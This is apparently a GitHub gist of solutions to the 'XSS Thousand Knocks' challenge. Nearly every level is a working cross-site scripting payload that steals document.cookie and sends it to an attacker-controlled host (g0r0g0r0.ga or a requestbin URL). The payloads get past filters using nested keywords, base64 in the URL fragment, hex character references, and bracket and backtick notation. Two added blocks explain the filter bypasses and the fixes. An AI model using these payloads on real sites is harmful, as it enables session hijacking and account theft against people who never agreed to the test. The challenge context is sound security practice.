@shiv3

shiv3/XSS Thousand Knocks.md

Last active Dec 5, 2018
1

As-is (the parameter is reflected unescaped, so the payload is plain JavaScript with no quoting tricks)

http://8293927d3c84ed42eef26dd9ceaaa3d9bf448dda.knock.xss.moe/?location=%22http://g0r0g0r0.ga:8000/psdkrwps/?%22%2Bdocument.cookie

2

script tag

q=<script>location="http://g0r0g0r0.ga:8000/psdkrwps/?"%2Bdocument.cookie</script>

3/4

img tag

q="><img%20src=1%20onerror=location="http://g0r0g0r0.ga:8000/psdkrwps/?"%2Bdocument.cookie>

5

Close the textarea tag (its content is RCDATA, so an <img> inside it would not be parsed as a tag)

</textarea><img%20src=1%20onerror=location="http://g0r0g0r0.ga:8000/psdkrwps/?"%2Bdocument.cookie>

6

Close the xmp tag (raw text element, same reason as textarea)

q=</xmp><img%20src=1%20onerror=location="http://g0r0g0r0.ga:8000/psdkrwps/?"%2Bdocument.cookie>

7

autofocus + onfocus

q=" autofocus onfocus="location=`http://g0r0g0r0.ga:8000/psdkrwps/?`%2Bdocument.cookie"

8

Close the ' and add onfocus

q=%27%20%20autofocus%20onfocus=location=`http://g0r0g0r0.ga:8000/psdkrwps/?`%2Bdocument.cookie '

9

onfocus

q='' %20autofocus%20onfocus=location=`http://g0r0g0r0.ga:8000/psdkrwps/?`%2Bdocument.cookie

10/11

Execute via a javascript: URL

q=javascript:location="http://g0r0g0r0.ga:8000/psdkrwps/?"%2Bdocument.cookie

12

img tag via innerHTML (inside a javascript: URL)

q=javascript:document.body.innerHTML+=`%3Cimg%20src=http://g0r0g0r0.ga:8000/psdkrwps?${document.cookie}%3E`

13

svg onload + location.hash (the base64 payload rides in the fragment, which is never sent to the server)

q=<svg%20onload=eval(atob(location.hash.substring(1)))>#bG9jYXRpb249Imh0dHA6Ly9nMHIwZzByMC5nYTo4MDAwL3BzZGtyd3BzLz8iK2RvY3VtZW50LmNvb2tpZQ==

14

Create an iframe of the target itself and rewrite document.domain

http://3cb34c8407410e2d6c1d708b786ce69a0192b470.knock.xss.moe/?q=http://8293927d3c84ed42eef26dd9ceaaa3d9bf448dda.knock.xss.moe/?document.domain=%228293927d3c84ed42eef26dd9ceaaa3d9bf448dda.knock.xss.moe%22;document.body.innerHTML+=`%3Cimg%20src=http://g0r0g0r0.ga:8000/psdkrwps?${document.cookie}%3E`

15

img tag

?q=<img%20src=1%20onerror=location="http://g0r0g0r0.ga:8000/psdkrwps/?"%2Bdocument.cookie>

16/17

javascript:

q=javascript:location="http://g0r0g0r0.ga:8000/psdkrwps/?"%2Bdocument.cookie

18

Close the function call with \'

q=\%27);location=`http://g0r0g0r0.ga:8000/psdkrwps/?`%2Bdocument.cookie//

19

fetch() concatenated inside the alert() argument

q=%27%2bfetch(`http://g0r0g0r0.ga:8000/psdkrwps/?${document.cookie}`)%2b%27

20

scripscriptt => script (the filter strips "script" once; also evades the XSS Auditor, since the request never contains a literal <script>)

q=%3Cscripscriptt%3Efetch(`http://g0r0g0r0.ga:8000/psdkrwps/?${document.cookie}`)%3C/scripscriptt%3E

21

onerrorscript => onerror (same single-pass strip; also evades the Auditor)

q=<img%20onerrorscript=fetch(`http://g0r0g0r0.ga:8000/psdkrwps/?${document.cookie}`)%20src=1>
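The filter behind knocks 20 and 21 removes the substring "script" once and never looks at the result again. The block below is an added example and not code from the gist: the exact filter body is an assumption (the gist only shows that "scripscriptt" becomes "script" and "onerrorscript" becomes "onerror"); the two payloads and the exfil URL are the gist's own. It puts the naive filter next to a fixed-point version and next to output encoding, and shows that only the last one handles both knocks.

```javascript
// Added example, not code from the gist: the one-pass keyword filter that
// knocks 20 and 21 imply, next to two fixes. The filter body is an
// assumption; the payloads and exfil URL are the gist's.

// Naive filter: one pass of replace(). A match that only exists after a
// removal ("scrip" + "script" + "t" -> "script") is never looked at again.
function naiveStrip(input) {
  return input.replace(/script/gi, "");
}

// Fix 1: strip to a fixed point, so "scripscriptt" -> "script" -> "".
function fixpointStrip(input) {
  let prev;
  let cur = input;
  do {
    prev = cur;
    cur = prev.replace(/script/gi, "");
  } while (cur !== prev);
  return cur;
}

// Fix 2: do not blacklist at all. Encode the characters that open tags and
// attributes so the reflected text can never become markup.
const HTML_ESCAPES = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#x27;" };
function htmlEncode(input) {
  return input.replace(/[&<>"']/g, (c) => HTML_ESCAPES[c]);
}

// Payloads from knocks 20 and 21.
const KNOCK20 = "<scripscriptt>fetch(`http://g0r0g0r0.ga:8000/psdkrwps/?${document.cookie}`)</scripscriptt>";
const KNOCK21 = "<img onerrorscript=fetch(`http://g0r0g0r0.ga:8000/psdkrwps/?${document.cookie}`) src=1>";

// Heuristic: does the filtered text still contain a literal <script> tag or
// an on*= handler attribute inside a tag? Good enough for this comparison.
function looksExecutable(html) {
  return /<script\b/i.test(html) || /<[a-z]+[^>]*\bon[a-z]+\s*=/i.test(html);
}

// Summarise what each filter does to each knock (true = still executes).
function compareFilters() {
  const filters = { naiveStrip, fixpointStrip, htmlEncode };
  const result = {};
  for (const [name, fn] of Object.entries(filters)) {
    result[name] = {
      knock20: looksExecutable(fn(KNOCK20)),
      knock21: looksExecutable(fn(KNOCK21)),
    };
  }
  return result;
}
```

The fixed-point strip closes knock 20 but not knock 21: "onerror" contains no "script", so a keyword blacklist has nothing to remove once the decoy is gone. Encoding the output is the only one of the three that neutralises both. The Auditor angle is separate: Chrome's XSS Auditor looked for the injected markup reflected from the request, and "<scripscriptt>" in the request does not match "<script>" in the response; the Auditor was removed in Chrome 78 (2019), so that part of the trick no longer matters.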

22/23

Execute via eval(atob(location.hash.substring(1)))

q=%3Cscript%3Eeval(atob(location.hash.substring(1)))%3C/script%3E#bG9jYXRpb249Imh0dHA6Ly9nMHIwZzByMC5nYTo4MDAwL3BzZGtyd3BzLz8iK2RvY3VtZW50LmNvb2tpZQ==

24

Execute via eval(location.hash.substring(1)), variant 2 (no atob; the URL string is built with String.fromCharCode so the fragment needs no quotes)

q=<svg%20onload=eval(location.hash.substring(1))>#fetch(String.fromCharCode(104,116,116,112,58,47,47,103,48,114,48,103,48,114,48,46,103,97,58,56,48,48,48,47,112,115,100,107,114,119,112,115,47,63)+document.cookie)

25

Get a domain name of 10 characters or fewer

Or keep generating is.gd short links until one fits in 10 characters

q=%3Cscript%20src=//abcdefgh.ga%3E%3C/script%3E

26

// Build "<IMG SRC=1 ONERROR=" + the handler with every character turned into a hex character reference (&#Xhh;)
b="<IMG SRC=1 ONERROR=" + "location.href=`http://requestbin.fullcontact.com/12kihxz1?${document.cookie}`".split("").map(s=>`&#X${s.charCodeAt().toString(16)};`).join("") + ">"
// URL-encode the result for the q parameter
encodeURIComponent(b)

generates the payload with the onerror handler encoded as hex HTML character references (not Unicode escapes: the browser decodes &#X..; in the attribute value before the handler is compiled)

=>

q=%3CIMG%20SRC%3D1%20ONERROR%3D%26%23X6c%3B%26%23X6f%3B%26%23X63%3B%26%23X61%3B%26%23X74%3B%26%23X69%3B%26%23X6f%3B%26%23X6e%3B%26%23X2e%3B%26%23X68%3B%26%23X72%3B%26%23X65%3B%26%23X66%3B%26%23X3d%3B%26%23X60%3B%26%23X68%3B%26%23X74%3B%26%23X74%3B%26%23X70%3B%26%23X3a%3B%26%23X2f%3B%26%23X2f%3B%26%23X72%3B%26%23X65%3B%26%23X71%3B%26%23X75%3B%26%23X65%3B%26%23X73%3B%26%23X74%3B%26%23X62%3B%26%23X69%3B%26%23X6e%3B%26%23X2e%3B%26%23X66%3B%26%23X75%3B%26%23X6c%3B%26%23X6c%3B%26%23X63%3B%26%23X6f%3B%26%23X6e%3B%26%23X74%3B%26%23X61%3B%26%23X63%3B%26%23X74%3B%26%23X2e%3B%26%23X63%3B%26%23X6f%3B%26%23X6d%3B%26%23X2f%3B%26%23X31%3B%26%23X32%3B%26%23X6b%3B%26%23X69%3B%26%23X68%3B%26%23X78%3B%26%23X7a%3B%26%23X31%3B%26%23X3f%3B%26%23X24%3B%26%23X7b%3B%26%23X64%3B%26%23X6f%3B%26%23X63%3B%26%23X75%3B%26%23X6d%3B%26%23X65%3B%26%23X6e%3B%26%23X74%3B%26%23X2e%3B%26%23X63%3B%26%23X6f%3B%26%23X6f%3B%26%23X6b%3B%26%23X69%3B%26%23X65%3B%26%23X7d%3B%26%23X60%3B%3E
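Knock 26 works because the HTML tokenizer decodes character references inside attribute values before the JavaScript engine ever sees the handler, so the markup contains no recognisable "location", "document" or backtick for a filter to match, yet the handler runs unchanged. The block below is an added example and not the gist's code: it rebuilds the knock-26 payload, models the attribute-value decoding step the browser performs, and checks the round trip and the start and end of the gist's own URL-encoded output. The handler and the requestbin URL are the gist's.

```javascript
// Added example, not the gist's code: hex character-reference encoding of an
// event-handler attribute (knock 26), plus a model of the decoding the HTML
// tokenizer applies to attribute values. The handler string is the gist's.

// Encode every character as &#Xhh; (HTML accepts x or X for hex references).
function toHexRefs(s) {
  return Array.from(s, (c) => `&#X${c.charCodeAt(0).toString(16)};`).join("");
}

// Build the knock-26 payload: only the attribute value is encoded; the tag
// and attribute names must stay literal for the parser to see an <img>.
function buildEntityPayload(handlerJs) {
  return `<IMG SRC=1 ONERROR=${toHexRefs(handlerJs)}>`;
}

// What the attribute-value tokenizer does with numeric references, reduced
// to the forms this payload uses: &#Xhh; / &#xhh; (hex) and &#nnn; (decimal).
// A model of the relevant part of the HTML spec, not a full parser.
function decodeNumericRefs(attrValue) {
  return attrValue.replace(/&#([xX][0-9a-fA-F]+|[0-9]+);/g, (_, body) => {
    const cp = /^[xX]/.test(body) ? parseInt(body.slice(1), 16) : parseInt(body, 10);
    return String.fromCodePoint(cp);
  });
}

// Pull the ONERROR value back out of the built tag so the round trip can be
// checked. The value is unquoted, so it runs to the closing ">".
function extractOnError(tag) {
  const m = /ONERROR=([^>]*)>/.exec(tag);
  return m ? m[1] : null;
}

const HANDLER = "location.href=`http://requestbin.fullcontact.com/12kihxz1?${document.cookie}`";

// The reflected URL parameter, derived exactly as the gist does it.
function buildQueryValue(handlerJs) {
  return encodeURIComponent(buildEntityPayload(handlerJs));
}
```

Two caveats worth knowing. The decoding only happens for attribute values; the body of a <script> element is raw text and references in it are not decoded, so this trick is specific to on* handlers and similar attributes. And because the decoded handler is identical to the plain one, a filter that matches on the raw input is the wrong layer: decode the way the browser does first, or, better, encode on output so an <img> tag is never created.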

27.

Hide the host in atob() and URL-encode the result

encodeURIComponent(`location["href"]=atob("aHR0cDovL3JlcXVlc3RiaW4uZnVsbGNvbnRhY3QuY29tLzEya2loeHoxPw")+document["cookie"]`)

http://295a1d900c5bf618101abf69083622d0f69aded1.knock.xss.moe/?q=<script>location%5B%22href%22%5D%3Datob(%22aHR0cDovL3JlcXVlc3RiaW4uZnVsbGNvbnRhY3QuY29tLzEya2loeHoxPw%22)%2Bdocument%5B%22cookie%22%5D</script>

28.

=> same as 26

29.

. is not allowed, so access properties with [""] (and write the dots inside the string as \u002e)

q=location["href"]="http://requestbin\u002efullcontact\u002ecom/12kihxz1?")%2bdocument["cookie"]

30.

" is not allowed either, so use backticks for the property names and the string

q=location[`href`]=`http://requestbin\u002efullcontact\u002ecom/12kihxz1?")`%2bdocument[`cookie`]

31.32.33

Use / instead of spaces to separate the tag name and attributes

q=<img/onerror="location.href=`http://requestbin.fullcontact.com/12kihxz1?${document.cookie}`"src=>

34

body onload

q=<body/%20onload=location.href=`http://requestbin.fullcontact.com/12kihxz1?${document.cookie}`//